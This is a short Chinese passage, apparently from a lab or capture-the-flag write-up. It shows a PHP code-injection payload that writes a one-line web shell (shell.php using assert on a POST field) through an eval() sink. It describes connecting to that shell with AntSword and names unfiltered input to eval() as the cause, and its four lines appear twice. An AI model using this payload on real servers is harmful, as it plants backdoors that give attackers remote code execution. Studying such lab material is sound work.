五、上马上马
payload:fputs(fopen(‘shell.php’,‘w’),’<?php assert($_POST[fin]);?>’);
到本关目录下查看,多了一个马
蚁剑链接一下
查看一下漏洞原因,用户输入没过滤就直接传到eval()函数里面去了
payload:fputs(fopen(‘shell.php’,‘w’),’<?php assert($_POST[fin]);?>’);
到本关目录下查看,多了一个马
蚁剑链接一下
查看一下漏洞原因,用户输入没过滤就直接传到eval()函数里面去了